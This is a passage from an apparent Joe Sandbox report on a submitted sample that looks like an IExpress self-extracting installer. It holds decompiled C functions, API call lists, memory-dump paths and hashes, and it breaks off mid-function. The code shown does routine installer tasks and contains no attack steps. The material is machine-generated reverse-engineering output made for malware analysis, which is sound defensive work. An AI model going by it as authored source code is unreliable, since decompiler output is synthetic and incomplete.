                              						_t119 = 1;
                              						_t114 = 3;
                              						 *0xa79a40 = 1;
                              						__eflags = _t133 - _t114;
                              						if(__eflags < 0) {
                              							L9:
                              							 *0xa78184 = _t135;
                              							 *0xa78180 = _t135;
                              							goto L14;
                              						}
                              						if(__eflags != 0) {
                              							goto L14;
                              						}
                              						__eflags = _v416.dwMinorVersion - 0x33;
                              						if(_v416.dwMinorVersion >= 0x33) {
                              							goto L14;
                              						}
                              						goto L9;
                              					}
                              					_t138 = 0x4ca;
                              					goto L44;
                              				} else {
                              					_t138 = 0x4b4;
                              					L44:
                              					_push(_t135);
                              					_push(0x10);
                              					_push(_t135);
                              					_push(_t135);
                              					L65:
                              					_t133 = _t138;
                              					E00A744B9(0, _t138);
                              					L66:
                              					return E00A76CE0(0 | _t138 == 0x00000000, _t115, _v8 ^ _t139, _t133, _t135, _t138);
                              				}
                              			}





































                              0x00a736f9
                              0x00a73700
                              0x00a7370c
                              0x00a73716
                              0x00a73718
                              0x00a7371b
                              0x00a73721
                              0x00a7372b
                              0x00a7373d
                              0x00a73745
                              0x00a73746
                              0x00a73746
                              0x00a73749
                              0x00a737ab
                              0x00a737ad
                              0x00a737ae
                              0x00a737b3
                              0x00a737b8
                              0x00a737b8
                              0x00a737bf
                              0x00a737bf
                              0x00a737c5
                              0x00000000
                              0x00000000
                              0x00a737cb
                              0x00a737cd
                              0x00000000
                              0x00000000
                              0x00a737d5
                              0x00a737db
                              0x00a737e8
                              0x00a737ea
                              0x00a737ea
                              0x00a737ea
                              0x00a737f0
                              0x00a737f6
                              0x00a73805
                              0x00a73817
                              0x00a7382b
                              0x00a73830
                              0x00a73836
                              0x00a7383b
                              0x00a7383d
                              0x00a738eb
                              0x00a738eb
                              0x00a738f2
                              0x00a7390c
                              0x00a73911
                              0x00a73911
                              0x00a73913
                              0x00a7394d
                              0x00a7394d
                              0x00a7394f
                              0x00a738a9
                              0x00a738a9
                              0x00a738b0
                              0x00a738b2
                              0x00a738b9
                              0x00a738bb
                              0x00a738c1
                              0x00a73975
                              0x00a738c7
                              0x00a738de
                              0x00a738e0
                              0x00a738e0
                              0x00a7397b
                              0x00a7397d
                              0x00a739a9
                              0x00a7397f
                              0x00a73982
                              0x00a7398b
                              0x00a7398d
                              0x00a7398f
                              0x00a7399f
                              0x00a739a1
                              0x00a73991
                              0x00a73991
                              0x00a73991
                              0x00a7398f
                              0x00a739af
                              0x00a739b6
                              0x00a73a0f
                              0x00a73a0f
                              0x00a73a11
                              0x00a73a13
                              0x00a73a19
                              0x00000000
                              0x00a739b8
                              0x00a739b8
                              0x00a739ba
                              0x00000000
                              0x00000000
                              0x00a739bc
                              0x00a739bf
                              0x00000000
                              0x00000000
                              0x00a739c3
                              0x00a739c9
                              0x00a739ce
                              0x00a739d0
                              0x00a739e3
                              0x00a739e5
                              0x00a739e6
                              0x00a739f1
                              0x00a739f7
                              0x00a739fa
                              0x00a73a01
                              0x00a73a04
                              0x00000000
                              0x00000000
                              0x00a73a06
                              0x00a73a09
                              0x00a73a09
                              0x00a73a0b
                              0x00a73a0b
                              0x00000000
                              0x00a73a09
                              0x00a739fc
                              0x00000000
                              0x00a739fc
                              0x00a739d3
                              0x00a739d8
                              0x00a739da
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00a739dc
                              0x00a739b6
                              0x00a73955
                              0x00a7395b
                              0x00000000
                              0x00000000
                              0x00a73961
                              0x00a73963
                              0x00000000
                              0x00000000
                              0x00a73969
                              0x00a73969
                              0x00000000
                              0x00a73969
                              0x00a73915
                              0x00a73915
                              0x00a7391b
                              0x00a7391f
                              0x00000000
                              0x00000000
                              0x00a7392d
                              0x00a73933
                              0x00a73938
                              0x00a7393a
                              0x00000000
                              0x00000000
                              0x00a73940
                              0x00a73946
                              0x00a7394b
                              0x00000000
                              0x00a7394b
                              0x00000000
                              0x00a738f2
                              0x00a73843
                              0x00a73845
                              0x00000000
                              0x00000000
                              0x00a7384b
                              0x00a7384d
                              0x00a73883
                              0x00a73885
                              0x00000000
                              0x00000000
                              0x00a7389a
                              0x00a7389e
                              0x00a7389e
                              0x00000000
                              0x00000000
                              0x00a738a0
                              0x00a738a0
                              0x00a738a2
                              0x00000000
                              0x00000000
                              0x00a738a4
                              0x00000000
                              0x00a738a4
                              0x00a7384f
                              0x00a73851
                              0x00a73857
                              0x00a7386e
                              0x00a73877
                              0x00a7387b
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00a73881
                              0x00a73859
                              0x00a7385c
                              0x00a73862
                              0x00a73866
                              0x00000000
                              0x00000000
                              0x00a73868
                              0x00000000
                              0x00a738f4
                              0x00a738f4
                              0x00a738f5
                              0x00a738fb
                              0x00a73901
                              0x00a73901
                              0x00000000
                              0x00a7390a
                              0x00a7374b
                              0x00a7374e
                              0x00a7375c
                              0x00a73764
                              0x00a73769
                              0x00a7376e
                              0x00a73771
                              0x00a7379c
                              0x00a7379f
                              0x00000000
                              0x00000000
                              0x00a737a3
                              0x00a737a4
                              0x00000000
                              0x00a737a4
                              0x00a73773
                              0x00a73777
                              0x00a73778
                              0x00a7377f
                              0x00a73781
                              0x00a7378e
                              0x00a7378e
                              0x00a73794
                              0x00000000
                              0x00a73794
                              0x00a73783
                              0x00000000
                              0x00000000
                              0x00a73785
                              0x00a7378c
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00a7378c
                              0x00a73750
                              0x00000000
                              0x00a7372d
                              0x00a7372d
                              0x00a7396b
                              0x00a7396b
                              0x00a7396c
                              0x00a7396e
                              0x00a7396f
                              0x00a73a1e
                              0x00a73a1e
                              0x00a73a22
                              0x00a73a27
                              0x00a73a3e
                              0x00a73a3e

                              APIs
                              • GetVersionExA.KERNEL32(?,00000000,?,?), ref: 00A73723
                              • MessageBeep.USER32(00000000), ref: 00A739C3
                              • MessageBoxA.USER32(00000000,00000000,lenta,00000030), ref: 00A739F1
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.444523475.0000000000A71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A70000, based on PE: true
                              • Associated: 00000001.00000002.444517050.0000000000A70000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444540149.0000000000A78000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444549142.0000000000A7A000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444549142.0000000000A7C000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a70000_bmKg.jbxd
                              Similarity
                              • API ID: Message$BeepVersion
                              • String ID: 3$lenta
                              • API String ID: 2519184315-4216304122
                              • Opcode ID: 85183e6610ab98390c5d373839b018ebabdb2db30035983d9607f32c351f2074
                              • Instruction ID: 9d6e064fdcf80da8a6393a9eaafd59d6c960ae46bcbe7f635aa7cc74fd39531d
                              • Opcode Fuzzy Hash: 85183e6610ab98390c5d373839b018ebabdb2db30035983d9607f32c351f2074
                              • Instruction Fuzzy Hash: 37910473B012149FEF34CB25CD91BAAB3B0AB85340F16C1A9D98D97251D7718F81EB41
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 83%
                              			E00A76495(void* __ebx, void* __ecx, void* __esi, void* __eflags) {
                              				signed int _v8;
                              				char _v268;
                              				void* __edi;
                              				signed int _t9;
                              				signed char _t14;
                              				struct HINSTANCE__* _t15;
                              				void* _t18;
                              				CHAR* _t26;
                              				void* _t27;
                              				signed int _t28;
                              
                              				_t27 = __esi;
                              				_t18 = __ebx;
                              				_t9 =  *0xa78004; // 0x74742267
                              				_v8 = _t9 ^ _t28;
                              				_push(__ecx);
                              				E00A71781( &_v268, 0x104, __ecx, "C:\Users\jones\AppData\Local\Temp\IXP001.TMP\");
                              				_t26 = "advpack.dll";
                              				E00A7658A( &_v268, 0x104, _t26);
                              				_t14 = GetFileAttributesA( &_v268);
                              				if(_t14 == 0xffffffff || (_t14 & 0x00000010) != 0) {
                              					_t15 = LoadLibraryA(_t26);
                              				} else {
                              					_t15 = LoadLibraryExA( &_v268, 0, 8);
                              				}
                              				return E00A76CE0(_t15, _t18, _v8 ^ _t28, 0x104, _t26, _t27);
                              			}













                              0x00a76495
                              0x00a76495
                              0x00a764a0
                              0x00a764a7
                              0x00a764ab
                              0x00a764bd
                              0x00a764c2
                              0x00a764d3
                              0x00a764df
                              0x00a764e8
                              0x00a76502
                              0x00a764ee
                              0x00a764f9
                              0x00a764f9
                              0x00a76516

                              APIs
                              • GetFileAttributesA.KERNEL32(?,advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000000), ref: 00A764DF
                              • LoadLibraryExA.KERNEL32(?,00000000,00000008,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000000), ref: 00A764F9
                              • LoadLibraryA.KERNEL32(advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000000), ref: 00A76502
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.444523475.0000000000A71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A70000, based on PE: true
                              • Associated: 00000001.00000002.444517050.0000000000A70000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444540149.0000000000A78000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444549142.0000000000A7A000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444549142.0000000000A7C000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a70000_bmKg.jbxd
                              Similarity
                              • API ID: LibraryLoad$AttributesFile
                              • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$advpack.dll
                              • API String ID: 438848745-875882553
                              • Opcode ID: b2642502bf26188fe7591608397a3f1f8bbb65de842055b4f2020f976e39c867
                              • Instruction ID: 3d61049b7bc2c1b535383eacc0f5af08617d9ad377260aabb3324fa306306db9
                              • Opcode Fuzzy Hash: b2642502bf26188fe7591608397a3f1f8bbb65de842055b4f2020f976e39c867
                              • Instruction Fuzzy Hash: 6B01D130A00108ABDB50DBB4DC49BEE7378EBA0311F90C699F58D921C0DF709ECB8A51
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E00A728E8(intOrPtr __ecx, char* __edx, intOrPtr* _a8) {
                              				void* _v8;
                              				char* _v12;
                              				intOrPtr _v16;
                              				void* _v20;
                              				intOrPtr _v24;
                              				int _v28;
                              				int _v32;
                              				void* _v36;
                              				int _v40;
                              				void* _v44;
                              				intOrPtr _v48;
                              				intOrPtr _v52;
                              				intOrPtr _v56;
                              				intOrPtr _v60;
                              				intOrPtr _v64;
                              				long _t68;
                              				void* _t70;
                              				void* _t73;
                              				void* _t79;
                              				void* _t83;
                              				void* _t87;
                              				void* _t88;
                              				intOrPtr _t93;
                              				intOrPtr _t97;
                              				intOrPtr _t99;
                              				int _t101;
                              				void* _t103;
                              				void* _t106;
                              				void* _t109;
                              				void* _t110;
                              
                              				_v12 = __edx;
                              				_t99 = __ecx;
                              				_t106 = 0;
                              				_v16 = __ecx;
                              				_t87 = 0;
                              				_t103 = 0;
                              				_v20 = 0;
                              				if( *((intOrPtr*)(__ecx + 0x7c)) <= 0) {
                              					L19:
                              					_t106 = 1;
                              				} else {
                              					_t62 = 0;
                              					_v8 = 0;
                              					while(1) {
                              						_v24 =  *((intOrPtr*)(_t99 + 0x80));
                              						if(E00A72773(_v12,  *((intOrPtr*)(_t62 + _t99 +  *((intOrPtr*)(_t99 + 0x80)) + 0xbc)) + _t99 + 0x84) == 0) {
                              							goto L20;
                              						}
                              						_t68 = GetFileVersionInfoSizeA(_v12,  &_v32);
                              						_v28 = _t68;
                              						if(_t68 == 0) {
                              							_t99 = _v16;
                              							_t70 = _v8 + _t99;
                              							_t93 = _v24;
                              							_t87 = _v20;
                              							if( *((intOrPtr*)(_t70 + _t93 + 0x84)) == _t106 &&  *((intOrPtr*)(_t70 + _t93 + 0x88)) == _t106) {
                              								goto L18;
                              							}
                              						} else {
                              							_t103 = GlobalAlloc(0x42, _t68);
                              							if(_t103 != 0) {
                              								_t73 = GlobalLock(_t103);
                              								_v36 = _t73;
                              								if(_t73 != 0) {
                              									if(GetFileVersionInfoA(_v12, _v32, _v28, _t73) == 0 || VerQueryValueA(_v36, "\\",  &_v44,  &_v40) == 0 || _v40 == 0) {
                              										L15:
                              										GlobalUnlock(_t103);
                              										_t99 = _v16;
                              										L18:
                              										_t87 = _t87 + 1;
                              										_t62 = _v8 + 0x3c;
                              										_v20 = _t87;
                              										_v8 = _v8 + 0x3c;
                              										if(_t87 <  *((intOrPtr*)(_t99 + 0x7c))) {
                              											continue;
                              										} else {
                              											goto L19;
                              										}
                              									} else {
                              										_t79 = _v44;
                              										_t88 = _t106;
                              										_v28 =  *((intOrPtr*)(_t79 + 0xc));
                              										_t101 = _v28;
                              										_v48 =  *((intOrPtr*)(_t79 + 8));
                              										_t83 = _v8 + _v16 + _v24 + 0x94;
                              										_t97 = _v48;
                              										_v36 = _t83;
                              										_t109 = _t83;
                              										do {
                              											 *((intOrPtr*)(_t110 + _t88 - 0x34)) = E00A72A89(_t97, _t101,  *((intOrPtr*)(_t109 - 0x10)),  *((intOrPtr*)(_t109 - 0xc)));
                              											 *((intOrPtr*)(_t110 + _t88 - 0x3c)) = E00A72A89(_t97, _t101,  *((intOrPtr*)(_t109 - 4)),  *_t109);
                              											_t109 = _t109 + 0x18;
                              											_t88 = _t88 + 4;
                              										} while (_t88 < 8);
                              										_t87 = _v20;
                              										_t106 = 0;
                              										if(_v56 < 0 || _v64 > 0) {
                              											if(_v52 < _t106 || _v60 > _t106) {
                              												GlobalUnlock(_t103);
                              											} else {
                              												goto L15;
                              											}
                              										} else {
                              											goto L15;
                              										}
                              									}
                              								}
                              							}
                              						}
                              						goto L20;
                              					}
                              				}
                              				L20:
                              				 *_a8 = _t87;
                              				if(_t103 != 0) {
                              					GlobalFree(_t103);
                              				}
                              				return _t106;
                              			}

































                              0x00a728f1
                              0x00a728f4
                              0x00a728f7
                              0x00a728f9
                              0x00a728fc
                              0x00a728ff
                              0x00a72901
                              0x00a72907
                              0x00a72a62
                              0x00a72a64
                              0x00a7290d
                              0x00a7290d
                              0x00a7290f
                              0x00a72912
                              0x00a72920
                              0x00a72937
                              0x00000000
                              0x00000000
                              0x00a72944
                              0x00a7294a
                              0x00a7294f
                              0x00a72a2f
                              0x00a72a32
                              0x00a72a34
                              0x00a72a37
                              0x00a72a41
                              0x00000000
                              0x00000000
                              0x00a72955
                              0x00a7295e
                              0x00a72962
                              0x00a72969
                              0x00a7296f
                              0x00a72974
                              0x00a7298c
                              0x00a72a20
                              0x00a72a21
                              0x00a72a27
                              0x00a72a4c
                              0x00a72a4f
                              0x00a72a50
                              0x00a72a53
                              0x00a72a56
                              0x00a72a5c
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00a729b2
                              0x00a729b2
                              0x00a729b5
                              0x00a729bd
                              0x00a729c3
                              0x00a729cc
                              0x00a729d5
                              0x00a729d7
                              0x00a729da
                              0x00a729dd
                              0x00a729df
                              0x00a729ec
                              0x00a729f8
                              0x00a729fc
                              0x00a729ff
                              0x00a72a02
                              0x00a72a07
                              0x00a72a0a
                              0x00a72a0f
                              0x00a72a19
                              0x00a72a81
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00a72a0f
                              0x00a7298c
                              0x00a72974
                              0x00a72962
                              0x00000000
                              0x00a7294f
                              0x00a72912
                              0x00a72a65
                              0x00a72a68
                              0x00a72a6c
                              0x00a72a6f
                              0x00a72a6f
                              0x00a72a7d

                              APIs
                              • GlobalFree.KERNEL32 ref: 00A72A6F
                                • Part of subcall function 00A72773: CharUpperA.USER32(74742267,00000000,00000000,00000000), ref: 00A727A8
                                • Part of subcall function 00A72773: CharNextA.USER32(0000054D), ref: 00A727B5
                                • Part of subcall function 00A72773: CharNextA.USER32(00000000), ref: 00A727BC
                                • Part of subcall function 00A72773: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00A72829
                                • Part of subcall function 00A72773: RegQueryValueExA.ADVAPI32(?,00A71140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00A72852
                                • Part of subcall function 00A72773: ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00A72870
                                • Part of subcall function 00A72773: RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00A728A0
                              • GlobalAlloc.KERNEL32(00000042,00000000,?,?,?,?,?,?,?,?,00A73938,?,?,?,?,-00000005), ref: 00A72958
                              • GlobalLock.KERNEL32 ref: 00A72969
                              • GlobalUnlock.KERNEL32(00000000,?,?,?,?,?,?,?,?,00A73938,?,?,?,?,-00000005,?), ref: 00A72A21
                              • GlobalUnlock.KERNEL32(00000000,?,?,?,?), ref: 00A72A81
                              Memory Dump Source
                              • Source File: 00000001.00000002.444523475.0000000000A71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A70000, based on PE: true
                              • Associated: 00000001.00000002.444517050.0000000000A70000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444540149.0000000000A78000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444549142.0000000000A7A000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444549142.0000000000A7C000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a70000_bmKg.jbxd
                              Similarity
                              • API ID: Global$Char$NextUnlock$AllocCloseEnvironmentExpandFreeLockOpenQueryStringsUpperValue
                              • String ID:
                              • API String ID: 3949799724-0
                              • Opcode ID: db5ce075f17af01057bb52b28d492f6c409eb80da93fd254c044c2780154d87b
                              • Instruction ID: 070fccf07f0ff72ef8f8da31ba96e4c5788fab72a37bdd73b8b96db50218c0d5
                              • Opcode Fuzzy Hash: db5ce075f17af01057bb52b28d492f6c409eb80da93fd254c044c2780154d87b
                              • Instruction Fuzzy Hash: 18512A31E00219EFCB21CF98CC84AAEBBB5FF48740F14C02AE909E3251DB319941DB94
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 32%
                              			E00A74169(void* __eflags) {
                              				int _t18;
                              				void* _t21;
                              
                              				_t20 = E00A7468F("FINISHMSG", 0, 0);
                              				_t21 = LocalAlloc(0x40, 4 + _t3 * 4);
                              				if(_t21 != 0) {
                              					if(E00A7468F("FINISHMSG", _t21, _t20) != 0) {
                              						if(lstrcmpA(_t21, "<None>") == 0) {
                              							L7:
                              							return LocalFree(_t21);
                              						}
                              						_push(0);
                              						_push(0x40);
                              						_push(0);
                              						_push(_t21);
                              						_t18 = 0x3e9;
                              						L6:
                              						E00A744B9(0, _t18);
                              						goto L7;
                              					}
                              					_push(0);
                              					_push(0x10);
                              					_push(0);
                              					_push(0);
                              					_t18 = 0x4b1;
                              					goto L6;
                              				}
                              				return E00A744B9(0, 0x4b5, 0, 0, 0x10, 0);
                              			}





                              0x00a7417d
                              0x00a7418f
                              0x00a74193
                              0x00a741b7
                              0x00a741d3
                              0x00a741e6
                              0x00000000
                              0x00a741e7
                              0x00a741d5
                              0x00a741d6
                              0x00a741d8
                              0x00a741d9
                              0x00a741da
                              0x00a741df
                              0x00a741e1
                              0x00000000
                              0x00a741e1
                              0x00a741b9
                              0x00a741ba
                              0x00a741bc
                              0x00a741bd
                              0x00a741be
                              0x00000000
                              0x00a741be
                              0x00000000

                              APIs
                                • Part of subcall function 00A7468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A746A0
                                • Part of subcall function 00A7468F: SizeofResource.KERNEL32(00000000,00000000,?,00A72D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A746A9
                                • Part of subcall function 00A7468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A746C3
                                • Part of subcall function 00A7468F: LoadResource.KERNEL32(00000000,00000000,?,00A72D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A746CC
                                • Part of subcall function 00A7468F: LockResource.KERNEL32(00000000,?,00A72D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A746D3
                                • Part of subcall function 00A7468F: memcpy_s.MSVCRT ref: 00A746E5
                                • Part of subcall function 00A7468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00A746EF
                              • LocalAlloc.KERNEL32(00000040,?,00000000,00000000,00000105,00000000,00A730B4), ref: 00A74189
                              • LocalFree.KERNEL32(00000000,?,00000000,00000000,00000105,00000000,00A730B4), ref: 00A741E7
                                • Part of subcall function 00A744B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A74518
                                • Part of subcall function 00A744B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00A74554
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.444523475.0000000000A71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A70000, based on PE: true
                              • Associated: 00000001.00000002.444517050.0000000000A70000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444540149.0000000000A78000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444549142.0000000000A7A000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444549142.0000000000A7C000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a70000_bmKg.jbxd
                              Similarity
                              • API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
                              • String ID: <None>$FINISHMSG
                              • API String ID: 3507850446-3091758298
                              • Opcode ID: cde7563a2698a53bba93fb80315a9d392f6f4ab9fdee8780f5abbd6be04811ec
                              • Instruction ID: acfe5b3e88341b8bd1f40c3329cb0d12abf3ca2aac80cef94b9eafc3ea5dca17
                              • Opcode Fuzzy Hash: cde7563a2698a53bba93fb80315a9d392f6f4ab9fdee8780f5abbd6be04811ec
                              • Instruction Fuzzy Hash: 4001FFB23002243BF3242BA94C86F7B218EDBE9795F40C235B70EE21809BA8CC4241B5
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 93%
                              			E00A719E0(void* __ebx, void* __edi, struct HWND__* _a4, intOrPtr _a8, int _a12, int _a16) {
                              				signed int _v8;
                              				char _v520;
                              				void* __esi;
                              				signed int _t11;
                              				void* _t14;
                              				void* _t23;
                              				void* _t27;
                              				void* _t33;
                              				struct HWND__* _t34;
                              				signed int _t35;
                              
                              				_t33 = __edi;
                              				_t27 = __ebx;
                              				_t11 =  *0xa78004; // 0x74742267
                              				_v8 = _t11 ^ _t35;
                              				_t34 = _a4;
                              				_t14 = _a8 - 0x110;
                              				if(_t14 == 0) {
                              					_t32 = GetDesktopWindow();
                              					E00A743D0(_t34, _t15);
                              					_v520 = 0;
                              					LoadStringA( *0xa79a3c, _a16,  &_v520, 0x200);
                              					SetDlgItemTextA(_t34, 0x83f,  &_v520);
                              					MessageBeep(0xffffffff);
                              					goto L6;
                              				} else {
                              					if(_t14 != 1) {
                              						L4:
                              						_t23 = 0;
                              					} else {
                              						_t32 = _a12;
                              						if(_t32 - 0x83d > 1) {
                              							goto L4;
                              						} else {
                              							EndDialog(_t34, _t32);
                              							L6:
                              							_t23 = 1;
                              						}
                              					}
                              				}
                              				return E00A76CE0(_t23, _t27, _v8 ^ _t35, _t32, _t33, _t34);
                              			}













                              0x00a719e0
                              0x00a719e0
                              0x00a719eb
                              0x00a719f2
                              0x00a719f9
                              0x00a719fc
                              0x00a71a01
                              0x00a71a2a
                              0x00a71a2e
                              0x00a71a3e
                              0x00a71a4f
                              0x00a71a62
                              0x00a71a6a
                              0x00000000
                              0x00a71a03
                              0x00a71a06
                              0x00a71a20
                              0x00a71a20
                              0x00a71a08
                              0x00a71a08
                              0x00a71a14
                              0x00000000
                              0x00a71a16
                              0x00a71a18
                              0x00a71a70
                              0x00a71a72
                              0x00a71a72
                              0x00a71a14
                              0x00a71a06
                              0x00a71a81

                              APIs
                              • EndDialog.USER32(?,?), ref: 00A71A18
                              • GetDesktopWindow.USER32 ref: 00A71A24
                              • LoadStringA.USER32(?,?,00000200), ref: 00A71A4F
                              • SetDlgItemTextA.USER32(?,0000083F,00000000), ref: 00A71A62
                              • MessageBeep.USER32(000000FF), ref: 00A71A6A
                              Memory Dump Source
                              • Source File: 00000001.00000002.444523475.0000000000A71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A70000, based on PE: true
                              • Associated: 00000001.00000002.444517050.0000000000A70000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444540149.0000000000A78000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444549142.0000000000A7A000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444549142.0000000000A7C000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a70000_bmKg.jbxd
                              Similarity
                              • API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
                              • String ID:
                              • API String ID: 1273765764-0
                              • Opcode ID: 2136b17a9046c7fe0c2ef6e6326d80bf5fbf7c0decf3736d8920c5427f20e435
                              • Instruction ID: ebe727032d45b3ee8281da0f12413e344873da00d9e87121ad39770204f95253
                              • Opcode Fuzzy Hash: 2136b17a9046c7fe0c2ef6e6326d80bf5fbf7c0decf3736d8920c5427f20e435
                              • Instruction Fuzzy Hash: 7611A531501109AFDB10EFA8DE08AAE77F8EF99341F50C265F51A96190DA349E42CB95
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E00A77155() {
                              				void* _v8;
                              				struct _FILETIME _v16;
                              				signed int _v20;
                              				union _LARGE_INTEGER _v24;
                              				signed int _t23;
                              				signed int _t36;
                              				signed int _t37;
                              				signed int _t39;
                              
                              				_v16.dwLowDateTime = _v16.dwLowDateTime & 0x00000000;
                              				_v16.dwHighDateTime = _v16.dwHighDateTime & 0x00000000;
                              				_t23 =  *0xa78004; // 0x74742267
                              				if(_t23 == 0xbb40e64e || (0xffff0000 & _t23) == 0) {
                              					GetSystemTimeAsFileTime( &_v16);
                              					_v8 = _v16.dwHighDateTime ^ _v16.dwLowDateTime;
                              					_v8 = _v8 ^ GetCurrentProcessId();
                              					_v8 = _v8 ^ GetCurrentThreadId();
                              					_v8 = GetTickCount() ^ _v8 ^  &_v8;
                              					QueryPerformanceCounter( &_v24);
                              					_t36 = _v20 ^ _v24.LowPart ^ _v8;
                              					_t39 = _t36;
                              					if(_t36 == 0xbb40e64e || ( *0xa78004 & 0xffff0000) == 0) {
                              						_t36 = 0xbb40e64f;
                              						_t39 = 0xbb40e64f;
                              					}
                              					 *0xa78004 = _t39;
                              				}
                              				_t37 =  !_t36;
                              				 *0xa78008 = _t37;
                              				return _t37;
                              			}











                              0x00a7715d
                              0x00a77161
                              0x00a77165
                              0x00a77178
                              0x00a77182
                              0x00a7718e
                              0x00a77197
                              0x00a771a0
                              0x00a771b1
                              0x00a771b8
                              0x00a771c4
                              0x00a771c7
                              0x00a771cb
                              0x00a771d5
                              0x00a771da
                              0x00a771da
                              0x00a771dc
                              0x00a771dc
                              0x00a771e2
                              0x00a771e5
                              0x00a771ee

                              APIs
                              • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00A77182
                              • GetCurrentProcessId.KERNEL32 ref: 00A77191
                              • GetCurrentThreadId.KERNEL32 ref: 00A7719A
                              • GetTickCount.KERNEL32 ref: 00A771A3
                              • QueryPerformanceCounter.KERNEL32(?), ref: 00A771B8
                              Memory Dump Source
                              • Source File: 00000001.00000002.444523475.0000000000A71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A70000, based on PE: true
                              • Associated: 00000001.00000002.444517050.0000000000A70000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444540149.0000000000A78000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444549142.0000000000A7A000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444549142.0000000000A7C000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a70000_bmKg.jbxd
                              Similarity
                              • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                              • String ID:
                              • API String ID: 1445889803-0
                              • Opcode ID: ebd36182b2cf29527ea51d48ee92a28b59c35b1e26567e8625588839782142f4
                              • Instruction ID: 9f4a8589f7068139dbb6b9b18c392b9ca708fcab513f96fcabcc0a6e52b1d3fc
                              • Opcode Fuzzy Hash: ebd36182b2cf29527ea51d48ee92a28b59c35b1e26567e8625588839782142f4
                              • Instruction Fuzzy Hash: F4113D71D01208EBCB10DFF8DE4869EB7F4EF58311F918565D40AD7210DA349A468B41
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 88%
                              			E00A763C0(void* __ecx, void* __eflags, long _a4, intOrPtr _a12, void* _a16) {
                              				signed int _v8;
                              				char _v268;
                              				long _v272;
                              				void* _v276;
                              				void* __ebx;
                              				void* __edi;
